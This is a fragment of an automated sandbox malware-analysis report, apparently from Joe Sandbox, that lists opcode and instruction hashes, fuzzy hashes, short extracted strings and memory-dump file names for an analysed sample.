                                                                              • API String ID:
                                                                              • Opcode ID: 7ccfc188acbc9401bbfbbb0696a9303eea0ac9b63cf310385da65e9fb4991b2c
                                                                              • Instruction ID: e4a09e71c4258db3d427396473dc29aa3bf1169a3ea5e46984b64b70d934d388
                                                                              • Opcode Fuzzy Hash: 7ccfc188acbc9401bbfbbb0696a9303eea0ac9b63cf310385da65e9fb4991b2c
                                                                              • Instruction Fuzzy Hash: C9F08274A012098FC380EFBCD50066EBBE6BB85204F10817AD409C3799EF349952CF92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2222239885
                                                                              • Opcode ID: 711ba5c54aa2b8da98c0a996596134a5c86ea08feb9dae924e6adaecfcaed277
                                                                              • Instruction ID: 6e490d5747ed65460779117349ffd7749d7de2932ffefb33e3a2d2436b3bf739
                                                                              • Opcode Fuzzy Hash: 711ba5c54aa2b8da98c0a996596134a5c86ea08feb9dae924e6adaecfcaed277
                                                                              • Instruction Fuzzy Hash: 83120B30F002198FDB68DF65C954AAEBBB2BF89305F248569D509AB354DB30DD86CF81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3823777903
                                                                              • Opcode ID: 9aad6b6ad3695546d46b40b44ef1504898f7736305562ce1da9e1bb8d3940bd5
                                                                              • Instruction ID: 91b58db531f4cc34aac5ef19983f994cd3a07e5100006cc075060570532832f6
                                                                              • Opcode Fuzzy Hash: 9aad6b6ad3695546d46b40b44ef1504898f7736305562ce1da9e1bb8d3940bd5
                                                                              • Instruction Fuzzy Hash: 8E915E30E10209DFEB68DFA4DA94B6EB7F2BF84705F208529D401AB394DB759D45CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-390881366
                                                                              • Opcode ID: b5b58615b275feb67f47f7c4df6cf3794edb244b93837535c2a4a98713269672
                                                                              • Instruction ID: d353edcf4c2905a9fb5beba175f5d5798ff838a5c3df1e05403c2bfd722f2838
                                                                              • Opcode Fuzzy Hash: b5b58615b275feb67f47f7c4df6cf3794edb244b93837535c2a4a98713269672
                                                                              • Instruction Fuzzy Hash: 73F14E34B00208CFDB59EF68D554A6EBBB3BF88305F248569D4059B398DB35EC86CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: cedd123dca743f5b04402cc2a93bb7ee83171a1c1da220a2288f84828abeb6c1
                                                                              • Instruction ID: 45c2bf3b69e6b8f0456e45561598c45c28e732adfa326aff2121555e6da87038
                                                                              • Opcode Fuzzy Hash: cedd123dca743f5b04402cc2a93bb7ee83171a1c1da220a2288f84828abeb6c1
                                                                              • Instruction Fuzzy Hash: A4B13C34A10209CFDB58EF69D58866EB7A3EF88305F248839D406DB395DB75DC86CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LR^q$LR^q$$^q$$^q
                                                                              • API String ID: 0-2454687669
                                                                              • Opcode ID: 57210166a333a296fd2fb5fa80b36cbe90c0585630bcd8b57c81be325367f2f7
                                                                              • Instruction ID: 73917c5d1de5c755c5becf2698b63f4059ea3b294cea33e02984feb26d1155bc
                                                                              • Opcode Fuzzy Hash: 57210166a333a296fd2fb5fa80b36cbe90c0585630bcd8b57c81be325367f2f7
                                                                              • Instruction Fuzzy Hash: 8651C130B002059FDB58EB68C948A6AB7E2FF88704F14897CE406DB3A5DB31EC45CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: c4265b06c6746d285502f1e823410f8a1d26bce37d1783319d2f165e8691d93a
                                                                              • Instruction ID: 4634e3857525cacc36e961ee953b2ac941479a737f2e1ad58cae8da5519ced52
                                                                              • Opcode Fuzzy Hash: c4265b06c6746d285502f1e823410f8a1d26bce37d1783319d2f165e8691d93a
                                                                              • Instruction Fuzzy Hash: 34518F30E10248DFDF69DBA8D590AAEB7B2EB88315F108929D806DB354DB31DC46CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%